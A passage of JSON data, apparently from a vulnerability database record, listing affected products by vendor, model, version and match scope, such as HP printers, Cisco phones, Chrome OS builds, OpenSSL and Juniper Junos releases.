        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.3"
      },
      {
        "model": "icewall sso dfw certd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "spa300 series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "laserjet enterprise m603 series ce996a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "model": "cit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.2"
      },
      {
        "model": "color laserjet cp6015 q3932a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.53"
      },
      {
        "model": "horizon workspace client for mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.5"
      },
      {
        "model": "communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "via for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "2.0.0"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5"
      },
      {
        "model": "color laserjet printer series q5983a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "380046.80.8"
      },
      {
        "model": "junos 11.4r9-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 0.9.8p",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.2"
      },
      {
        "model": "telepresence isdn link",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "sbr enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.6"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "puremessage for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "4.05"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.4"
      },
      {
        "model": "storevirtual fc 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "model": "tivoli storage productivity center fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.14"
      },
      {
        "model": "sterling connect:enterprise for unix ifix03",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.5.0.3"
      },
      {
        "model": "power express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7300"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "officejet enterprise color mfp b5l04a 2302963 436066",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "x585"
      },
      {
        "model": "sterling connect:direct for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5.01"
      },
      {
        "model": "snapdrive for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "model": "via for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "2.0.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "model": "pulse desktop 5.0r3.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.06"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.3.61.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "model": "secure access control server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.1.2"
      },
      {
        "model": "junos 5.0r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.1"
      },
      {
        "model": "fortios build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.2.0589"
      },
      {
        "model": "virtualization experience media engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jetdirect 620n eio card j7934g",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "29.26"
      },
      {
        "model": "junos 10.0s18",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "scanjet enterprise document capture workstation l2719a 2302963 436065",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8500"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "model": "jabber im for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "model": "small cell factory recovery root filesystem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.99.4"
      },
      {
        "model": "proxysgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.4"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.45"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.0.2"
      },
      {
        "model": "service manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.31"
      },
      {
        "model": "aura messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.1"
      },
      {
        "model": "flex system enterprise chassis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8724"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "model": "ftp server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cerberus",
        "version": "7.0"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.9.2"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "color laserjet flow m680 ca251a 2302963 436072",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x365079150"
      },
      {
        "model": "exalogic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x3-22.0.6.2.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.4"
      },
      {
        "model": "storevirtual china hybrid storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.6"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.10"
      },
      {
        "model": "espace vtm v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "spa122 ata with router",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "junos 10.4r",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.15"
      },
      {
        "model": "web security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.3"
      },
      {
        "model": "config manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.6"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.3"
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.6"
      },
      {
        "model": "websphere datapower soa appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.6"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "infosphere guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "ssl vpn 8.0r4.1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.2.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.4"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.5"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "chrome for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0"
      },
      {
        "model": "spa525 series ip phones",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "data ontap smi-s agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2.1"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.4.0.15"
      },
      {
        "model": "cp1543-1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "1.1.25"
      },
      {
        "model": "laserjet m9050 multifunction printer cc395a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51.256.1"
      },
      {
        "model": "ive os 7.4r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.41"
      },
      {
        "model": "laserjet enterprise color m551 series cf081a 2302963 436083",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "500"
      },
      {
        "model": "advanced settings utility",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.52"
      },
      {
        "model": "msr30 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8v"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.4.0"
      },
      {
        "model": "color laserjet enterprise m750 d3l10a 2302963 436077",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "color laserjet cp3505 printer series cb443a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.160.2"
      },
      {
        "model": "laserjet enterprise m601 series ce990a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "oncommand workflow automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "proxysg sgos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.2.15.6"
      },
      {
        "model": "algo audit and compliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.54"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x357087330"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.30"
      },
      {
        "model": "utm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "9.113"
      },
      {
        "model": "espace u2980 v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.9"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.3"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.4"
      },
      {
        "model": "color laserjet printer series q7536a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "300046.80.2"
      },
      {
        "model": "clearpass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.2.0"
      },
      {
        "model": "identity service engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jsa 2014.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.2"
      },
      {
        "model": "9.2-release-p3",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli storage productivity center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.177"
      },
      {
        "model": "s12700 v200r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "snapdrive for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "model": "8.4-release-p11",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli workload scheduler distributed fp04",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "oceanstor s2200t v100r005",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "scale out network attached storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.3.1"
      },
      {
        "model": "system type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3950x571431.43"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.0"
      },
      {
        "model": "hsr6602 russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "model": "cognos metrics manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.1.1"
      },
      {
        "model": "laserjet enterprise color m775 series cc524a 2302963 436079",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "700"
      },
      {
        "model": "s7-1500",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.23"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v39.7"
      },
      {
        "model": "s2900 v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "open source security information management",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.10"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "9.6"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.21"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "model": "email security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "datafort common criteria fc-series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "junos 11.4r7-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.20"
      },
      {
        "model": "pulse desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "model": "usg5000 v300r001c10spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.7"
      },
      {
        "model": "ovf tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.5.1"
      },
      {
        "model": "storevirtual china hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.0"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.1.1"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.9"
      },
      {
        "model": "hp-ux b.11.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "message networking sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.1.5.1"
      },
      {
        "model": "stunnel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stunnel",
        "version": "5.00"
      },
      {
        "model": "chargeback manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.5"
      },
      {
        "model": "web security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.7.3"
      },
      {
        "model": "laserjet enterprise flow m830z mfp cf367a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "officejet enterprise color mfp b5l07a 2302963 436066",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "x585"
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.0"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.3"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "power express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7500"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.5.0.15"
      },
      {
        "model": "junos 12.1x45-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "laserjet m4345 multifunction printer cb428a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.8"
      },
      {
        "model": "junos 13.2r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.0.4"
      },
      {
        "model": "fortimail build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.3281"
      },
      {
        "model": "color laserjet enterprise m750 d3l08a 2302963 436077",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "s5900 v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight v2r3c10spc201",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "laserjet pro m401a/d/dn/dnw/dw/n cf278a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020150212"
      },
      {
        "model": "ssl vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.4"
      },
      {
        "model": "web security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.40"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.4"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.78"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "project openssl 0.9.8l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.13"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.65"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.95"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.5"
      },
      {
        "model": "vma",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.11"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70000"
      },
      {
        "model": "project openssl h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.31"
      },
      {
        "model": "s3900 v100r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "adaptive security appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.8"
      },
      {
        "model": "proxysgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1.6.3"
      },
      {
        "model": "proxyav",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.5.21"
      },
      {
        "model": "anyoffice emm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "2.6.0601.0090"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "model": "project openssl i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "0.8"
      },
      {
        "model": "tssc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.12"
      },
      {
        "model": "color laserjet enterprise m750 d3l09a 2302963 436077",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "web security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.3"
      },
      {
        "model": "service manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.33"
      },
      {
        "model": "ssl for openvms",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-476"
      },
      {
        "model": "system x3400m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73781.42"
      },
      {
        "model": "strm/jsa 2013.2r8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "project openssl 1.0.0i",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.171"
      },
      {
        "model": "vcenter support assistant",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.1"
      },
      {
        "model": "laserjet p4015 cb511a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "msr50-g2 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "i v5r4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "storevirtual 1tb mdl china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.1.21"
      },
      {
        "model": "exalogic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x4-22.0.6.2.0"
      },
      {
        "model": "system x3550m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79461.42"
      },
      {
        "model": "usg9500 usg9500 v200r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "tssc",
        "scope": "eq",
        "trust": 0.3,
